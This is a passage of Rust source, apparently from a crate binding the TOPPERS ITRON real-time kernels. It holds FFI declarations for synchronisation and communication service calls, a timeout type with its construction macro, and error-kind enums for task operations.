pub const TA_TPRI: ATR = 0x01;
/// 複数の待ちタスク
pub const TA_WMUL: ATR = 0x02;
/// イベントフラグのクリア指定
pub const TA_CLR: ATR = 0x04;
/// 優先度上限プロトコル
pub const TA_CEILING: ATR = 0x03;
#[cfg(all(feature = "solid_asp3", feature = "pi_mutex"))]
/// 優先度継承プロトコル
pub const TA_INHERIT: ATR = 0x02;
/*
* サービスコールの動作モードの定義
*/
/// イベントフラグのOR待ち
pub const TWF_ORW: MODE = 0x01;
/// イベントフラグのAND待ち
pub const TWF_ANDW: MODE = 0x02;
/*
* オブジェクトの状態の定義
*/
/// スピンロックが取得されていない状態
#[cfg(feature = "fmp3")]
pub const TSPN_UNL: STAT = 0x01;
/// スピンロックが取得されている状態
#[cfg(feature = "fmp3")]
pub const TSPN_LOC: STAT = 0x02;
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RSEM {
/// セマフォの待ち行列の先頭のタスクのID番号
pub wtskid: ID,
/// セマフォの現在の資源数
pub semcnt: uint_t,
}
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RFLG {
/// イベントフラグの待ち行列の先頭のタスクのID番号
pub wtskid: ID,
/// イベントフラグの現在のビットパターン
pub flgptn: FLGPTN,
}
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RDTQ {
/// データキューの送信待ち行列の先頭のタスクのID番号
pub stskid: ID,
/// データキューの受信待ち行列の先頭のタスクのID番号
pub rtskid: ID,
/// データキュー管理領域に格納されているデータの数
pub sdtqcnt: uint_t,
}
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RPDQ {
/// 優先度データキューの送信待ち行列の先頭のタスクのID番号
pub stskid: ID,
/// 優先度データキューの受信待ち行列の先頭のタスクのID番号
pub rtskid: ID,
/// 優先度データキュー管理領域に格納されているデータの数
pub spdqcnt: uint_t,
}
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMTX {
/// ミューテックスをロックしているタスクのID番号
pub htskid: ID,
/// ミューテックスの待ち行列の先頭のタスクのID番号
pub wtskid: ID,
}
#[cfg(any(
all(feature = "asp3", feature = "messagebuf"),
all(feature = "solid_asp3", feature = "messagebuf")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMBF {
/// メッセージバッファの送信待ち行列の先頭のタスクのID番号
pub stskid: ID,
/// メッセージバッファの受信待ち行列の先頭のタスクのID番号
pub rtskid: ID,
/// メッセージバッファ管理領域に格納されているメッセージの数
pub smbfcnt: uint_t,
/// メッセージバッファ管理領域中の空き領域のサイズ
pub fmbfsz: usize,
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RSPN {
/// スピンロックのロック状態
pub spnstat: STAT,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CSEM {
/// セマフォ属性
pub sematr: ATR,
/// セマフォの初期資源数
pub isemcnt: uint_t,
/// セマフォの最大資源数
pub maxsem: uint_t,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CFLG {
/// イベントフラグ属性
pub flgatr: ATR,
/// イベントフラグの初期ビットパターン
pub iflgptn: FLGPTN,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CDTQ {
/// データキュー属性
pub dtqatr: ATR,
/// データキュー管理領域に格納できるデータ数
pub dtqcnt: uint_t,
/// データキュー管理領域の先頭番地
pub dtqmb: *mut u8,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CPDQ {
/// 優先度データキュー属性
pub pdqatr: ATR,
/// 優先度データキュー管理領域に格納できるデータ数
pub pdqcnt: uint_t,
/// 優先度データキューに送信できるデータ優先度の最大値
pub maxdpri: PRI,
/// 優先度データキュー管理領域の先頭番地
pub pdqmb: *mut u8,
}
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMTX {
/// ミューテックス属性
pub mtxatr: ATR,
/// ミューテックスの上限優先度
pub ceilpri: PRI,
}
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CSPN {
/// スピンロック属性
pub spnatr: ATR,
}
/// SOLID/ASP3 extension
#[cfg(all(feature = "solid_asp3", feature = "dcre", feature = "messagebuf"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMBF {
/// メッセージバッファ属性
pub mbfatr: ATR,
/// メッセージの最大長
pub maxmsz: uint_t,
/// メッセージバッファ管理領域のサイズ
pub mbfsz: usize,
/// メッセージバッファ管理領域の先頭番地
pub mbfmb: *mut u8,
}
/// 同期・通信機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn sig_sem(semid: ID) -> ER;
pub fn wai_sem(semid: ID) -> ER;
pub fn pol_sem(semid: ID) -> ER;
pub fn twai_sem(semid: ID, tmout: TMO) -> ER;
pub fn ini_sem(semid: ID) -> ER;
pub fn ref_sem(semid: ID, pk_rsem: *mut T_RSEM) -> ER;
pub fn set_flg(flgid: ID, setptn: FLGPTN) -> ER;
pub fn clr_flg(flgid: ID, clrptn: FLGPTN) -> ER;
pub fn wai_flg(flgid: ID, waiptn: FLGPTN, wfmode: MODE, p_flgptn: *mut FLGPTN) -> ER;
pub fn pol_flg(flgid: ID, waiptn: FLGPTN, wfmode: MODE, p_flgptn: *mut FLGPTN) -> ER;
pub fn twai_flg(
flgid: ID,
waiptn: FLGPTN,
wfmode: MODE,
p_flgptn: *mut FLGPTN,
tmout: TMO,
) -> ER;
pub fn ini_flg(flgid: ID) -> ER;
pub fn ref_flg(flgid: ID, pk_rflg: *mut T_RFLG) -> ER;
pub fn snd_dtq(dtqid: ID, data: isize) -> ER;
pub fn psnd_dtq(dtqid: ID, data: isize) -> ER;
pub fn tsnd_dtq(dtqid: ID, data: isize, tmout: TMO) -> ER;
pub fn fsnd_dtq(dtqid: ID, data: isize) -> ER;
pub fn rcv_dtq(dtqid: ID, p_data: *mut isize) -> ER;
pub fn prcv_dtq(dtqid: ID, p_data: *mut isize) -> ER;
pub fn trcv_dtq(dtqid: ID, p_data: *mut isize, tmout: TMO) -> ER;
pub fn ini_dtq(dtqid: ID) -> ER;
pub fn ref_dtq(dtqid: ID, pk_rdtq: *mut T_RDTQ) -> ER;
pub fn snd_pdq(pdqid: ID, data: isize, datapri: PRI) -> ER;
pub fn psnd_pdq(pdqid: ID, data: isize, datapri: PRI) -> ER;
pub fn tsnd_pdq(pdqid: ID, data: isize, datapri: PRI, tmout: TMO) -> ER;
pub fn rcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI) -> ER;
pub fn prcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI) -> ER;
pub fn trcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI, tmout: TMO) -> ER;
pub fn ini_pdq(pdqid: ID) -> ER;
pub fn ref_pdq(pdqid: ID, pk_rpdq: *mut T_RPDQ) -> ER;
pub fn loc_mtx(mtxid: ID) -> ER;
pub fn ploc_mtx(mtxid: ID) -> ER;
pub fn tloc_mtx(mtxid: ID, tmout: TMO) -> ER;
pub fn unl_mtx(mtxid: ID) -> ER;
pub fn ini_mtx(mtxid: ID) -> ER;
pub fn ref_mtx(mtxid: ID, pk_rmtx: *mut T_RMTX) -> ER;
}
/// 同期・通信機能
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
pub fn loc_spn(spnid: ID) -> ER;
pub fn unl_spn(spnid: ID) -> ER;
pub fn try_spn(spnid: ID) -> ER;
pub fn ref_spn(spnid: ID, pk_rspn: *mut T_RSPN) -> ER;
}
/// 同期・通信機能
#[cfg(any(
all(feature = "asp3", feature = "dcre"),
all(feature = "solid_asp3", feature = "dcre"),
all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
pub fn acre_sem(pk_csem: *const T_CSEM) -> ER_ID;
pub fn acre_flg(pk_cflg: *const T_CFLG) -> ER_ID;
pub fn acre_dtq(pk_cdtq: *const T_CDTQ) -> ER_ID;
pub fn acre_pdq(pk_cpdq: *const T_CPDQ) -> ER_ID;
pub fn acre_mtx(pk_cmtx: *const T_CMTX) -> ER_ID;
pub fn del_sem(semid: ID) -> ER;
pub fn del_flg(flgid: ID) -> ER;
pub fn del_dtq(dtqid: ID) -> ER;
pub fn del_pdq(pdqid: ID) -> ER;
pub fn del_mtx(mtxid: ID) -> ER;
}
/// 同期・通信機能
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
extern "C" {
pub fn acre_spn(pk_cspn: *const T_CSPN) -> ER_ID;
pub fn del_spn(spnid: ID) -> ER;
}
/// 同期・通信機能
#[cfg(any(
all(feature = "asp3", feature = "messagebuf"),
all(feature = "solid_asp3", feature = "messagebuf")
))]
extern "C" {
pub fn snd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t) -> ER;
pub fn psnd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t) -> ER;
pub fn tsnd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t, tmout: TMO) -> ER;
pub fn rcv_mbf(mbfid: ID, msg: *mut u8) -> super::ER_UINT;
pub fn prcv_mbf(mbfid: ID, msg: *mut u8) -> super::ER_UINT;
pub fn trcv_mbf(mbfid: ID, msg: *mut u8, tmout: TMO) -> super::ER_UINT;
pub fn ini_mbf(mbfid: ID) -> ER;
pub fn ref_mbf(mbfid: ID, pk_rmbf: *mut T_RMBF) -> ER;
}
/// SOLID/ASP3 extension
#[cfg(all(feature = "solid_asp3", feature = "dcre", feature = "messagebuf"))]
extern "C" {
pub fn acre_mbf(pk_cmbf: *const T_CMBF) -> ER_ID;
pub fn del_mbf(mbfid: ID) -> ER;
}
<file_sep>/src/time/timeout.rs
use crate::abi;
use core::{convert::TryFrom, time::Duration as StdDuration};
use super::Duration;
/// A valid timeout value ([`abi::TMO`]).
///
/// In addition to finite durations, this type can represent the following
/// special values:
/// [`ZERO`] indicating zero or polling and [`FOREVER`] representing an
/// infinite duration. **`TMO_NBLK` is not a valid value for this type.**
///
/// [`ZERO`]: Self::ZERO
/// [`FOREVER`]: Self::FOREVER
#[cfg_attr(
feature = "nightly",
doc = "[`timeout!`] can be used to construct a `Timeout` in a concise syntax."
)]
#[cfg_attr(
not(feature = "nightly"),
doc = "If `nightly` feature is enabled, \
`timeout!` can be used to construct a `Timeout` in a concise syntax."
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[repr(transparent)]
pub struct Timeout {
value: abi::TMO,
}
impl Timeout {
/// The zero timeout value, which causes polling.
// Safety: It's a valid timeout value
pub const ZERO: Self = unsafe { Self::from_raw(abi::TMO_POL) };
/// The infinite timeout value.
// Safety: It's a valid timeout value
pub const FOREVER: Self = unsafe { Self::from_raw(abi::TMO_FEVR) };
/// Construct a new `Timeout` from a raw value.
///
/// # Safety
///
/// `value` must be a valid timeout value. This crate treats `E_PAR` caused
/// by invalid timeout values as a [critical error].
///
/// [critical error]: crate::error
#[inline]
pub const unsafe fn from_raw(value: abi::TMO) -> Self {
Self { value }
}
#[inline]
pub const fn as_raw(self) -> abi::TMO {
self.value
}
#[inline]
pub const fn is_finite(self) -> bool {
self.value != Self::FOREVER.value
}
/// Construct a new `Timeout` from the specified number of seconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_secs(secs: u64) -> Option<Self> {
if secs > u64::MAX / 1_000_000 {
None
} else {
Self::from_micros(secs * 1_000_000)
}
}
/// Construct a new `Timeout` from the specified number of milliseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_millis(millis: u64) -> Option<Self> {
if millis > u64::MAX / 1_000 {
None
} else {
Self::from_micros(millis * 1_000)
}
}
/// Construct a new `Timeout` from the specified number of microseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub const fn from_micros(micros: u64) -> Option<Self> {
match () {
() => {
if micros > abi::TMAX_RELTIM as u64 {
None
} else {
// Safety: It's a valid timeout value
Some(unsafe { Self::from_raw(micros as u32) })
}
}
}
}
/// Construct a new `Timeout` from the specified number of nanoseconds.
///
/// Returns `None` if the specified duration is not representable.
#[inline]
pub fn from_nanos(nanos: u128) -> Option<Self> {
// TODO: make it `const fn`
u64::try_from(nanos / 1_000)
.ok()
.and_then(Self::from_micros)
}
}
/// The error type returned when a checked duration conversion fails.
pub struct TryFromDurationError(pub(super) ());
impl TryFrom<StdDuration> for Timeout {
type Error = TryFromDurationError;
#[inline]
fn try_from(d: StdDuration) -> Result<Self, Self::Error> {
Self::from_nanos(d.as_nanos()).ok_or(TryFromDurationError(()))
}
}
impl TryFrom<Duration> for Timeout {
type Error = TryFromDurationError;
#[inline]
fn try_from(d: Duration) -> Result<Self, Self::Error> {
match () {
() => {
// In TOPPERS 3rd gen kernel, both types use the same range
// Safety: It's a valid timeout value
Ok(unsafe { Self::from_raw(d.as_raw()) })
}
}
}
}
/// Construct a [`Timeout`] value in a concise syntax. Panics if the specified
/// duration cannot be represented by `Timeout`.
///
/// # Examples
///
/// ```
/// use itron::time::{timeout, Timeout};
/// assert_eq!(Timeout::ZERO, timeout!(0));
/// assert_eq!(Timeout::FOREVER, timeout!(infinity));
/// assert_eq!(Timeout::from_millis(42).unwrap(), timeout!(ms: 42));
/// ```
///
/// Panics if the value is out of range:
///
/// ```should_panic
/// # use itron::time::timeout;
/// let _ = timeout!(s: 0x7ffffffffffffff * 2);
/// ```
///
/// Once [`inline_const`] lands, it will be possible to do the check at
/// compile-time:
///
/// ```compile_fail
/// #![feature(inline_const)]
/// # use itron::time::timeout;
/// let _ = const { timeout!(s: 0x7ffffffffffffff * 2) };
/// ```
///
/// Literal values are validated at compile-time regardless of whether
/// `const { ... }` is used or not:
///
/// ```compile_fail
/// # use itron::time::timeout;
/// let _ = timeout!(s: 0xfffffffffffffff);
/// ```
///
/// ```should_panic
/// # use itron::time::timeout;
/// // Wrap the expression with `( ... )` to avoid the above behavior and
/// // cause a runtime panic.
/// let _ = timeout!(s: (0xfffffffffffffff));
/// ```
///
/// [`inline_const`]: https://rust-lang.github.io/rfcs/2920-inline-const.html
#[cfg(feature = "nightly")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "nightly")))]
pub macro timeout {
// Compile-time checked literals
($kind:tt: $value:literal) => {{
const VALUE: $crate::time::Timeout = $crate::time::timeout!($kind: ($value));
VALUE
}},
// Seconds
(s: $value:expr) => {
$crate::time::expect_valid_timeout($crate::time::Timeout::from_secs($value))
},
// Milliseconds
(ms: $value:expr) => {
$crate::time::expect_valid_timeout($crate::time::Timeout::from_millis($value))
},
// Microseconds
(us: $value:expr) => {
$crate::time::expect_valid_timeout($crate::time::Timeout::from_micros($value))
},
// Microseconds
(μs: $value:expr) => {
$crate::time::expect_valid_timeout($crate::time::Timeout::from_micros($value))
},
// Nanoseconds
(ns: $value:expr) => {
$crate::time::expect_valid_timeout($crate::time::Timeout::from_nanos($value))
},
// Infinity
(infinity) => { $crate::time::Timeout::FOREVER },
// Zero
(0) => { $crate::time::Timeout::ZERO },
}
/// Panics if the specified `Option<Timeout>` is `None`. Used by `timeout!`.
#[cfg(feature = "nightly")]
#[doc(hidden)]
#[track_caller]
#[inline]
pub const fn expect_valid_timeout(x: Option<Timeout>) -> Timeout {
if let Some(x) = x {
x
} else {
// Panics in `const fn` are unstable at the point of writing
let zero = 0u32;
#[allow(unconditional_panic)]
let __the_specified_timeout_is_invalid_or_not_representable__ = 1 / zero;
#[allow(clippy::empty_loop)]
loop {}
}
}
<file_sep>/src/task.rs
//! Tasks
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
processor::Processor,
time::{Duration, Timeout},
};
// TODO: sta_ovr
// TODO: stp_ovr
// TODO: ref_ovr
// TODO: chg_spr
// TODO: chg_spr
// TODO: TA_NOACTQUE
// TODO: TA_RTSK
define_error_kind! {
/// Error type for [`TaskRef::activate`].
pub enum ActivateError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
QueueOverflow,
}
}
impl ErrorKind for ActivateError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
_ => None,
}
}
}
// Note: `activate_on` reduces to `activate` on a uniprocessor kernel
define_error_kind! {
/// Error type for [`TaskRef::activate_on`].
pub enum ActivateOnError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(feature = "rstr_task", any()))]
NotSupported,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
QueueOverflow,
/// The class the task belongs to does not permit assigning tasks to the
/// specified processor.
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
BadParam,
}
}
impl ErrorKind for ActivateOnError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(feature = "rstr_task", any()))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::cancel_activate_all`].
pub enum CancelActivateAllError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for CancelActivateAllError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::set_base_priority`].
pub enum SetBasePriorityError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is dormant.
#[cfg(not(feature = "none"))]
BadState,
/// Bad parameter.
///
/// - The task is a restricted task, for which changing the priority is
/// not supported (NGKI1186).
///
/// - The specified priority is out of range.
///
/// - The task owns a priority-ceiling mutex, and the specified priority
/// is higher than the mutex's priority ceiling.
///
#[cfg(not(feature = "none"))]
BadParam,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for SetBasePriorityError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_NOSPT | abi::E_ILUSE => {
Some(Self::BadParam(Kind::from_error_code(code)))
}
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::priority`].
pub enum PriorityError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is dormant.
#[cfg(not(feature = "none"))]
BadState,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for PriorityError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is a critical error, so it's excluded from here
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
// Note: `migrate` is no-op on a uniprocessor kernel
define_error_kind! {
/// Error type for [`TaskRef::migrate`].
pub enum MigrateError {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
BadContext,
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
BadId,
/// Bad parameter.
///
/// - The task is a restricted task, for which migration is
/// not supported (`E_NOSPT`, NGKI1186).
///
/// - The class the task belongs to does not permit assigning tasks to
/// the specified processor (`E_PAR`, NGKI1160).
///
/// - The task belongs to a processs that is different from the calling
/// processor (`E_OBJ`, NGK1157).
///
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
BadParam,
#[cfg(any())]
AccessDenied,
}
}
#[cfg(any(feature = "none", feature = "fmp3", feature = "solid_fmp3"))]
impl ErrorKind for MigrateError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
abi::E_PAR | abi::E_NOSPT | abi::E_OBJ => {
Some(Self::BadParam(Kind::from_error_code(code)))
}
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::state`].
pub enum StateError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for StateError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACX` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACX` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::wake`].
pub enum WakeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is dormant.
///
#[cfg(not(feature = "none"))]
BadState,
#[cfg(not(feature = "none"))]
QueueOverflow,
}
}
impl ErrorKind for WakeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::cancel_wake_all`].
pub enum CancelWakeAllError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is dormant.
///
#[cfg(not(feature = "none"))]
BadState,
}
}
impl ErrorKind for CancelWakeAllError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`TaskRef::release_wait`].
pub enum ReleaseWaitError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(any())]
AccessDenied,
/// Bad state.
///
/// - The task is not waiting.
///
#[cfg(not(feature = "none"))]
BadState,
}
}
impl ErrorKind for ReleaseWaitError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
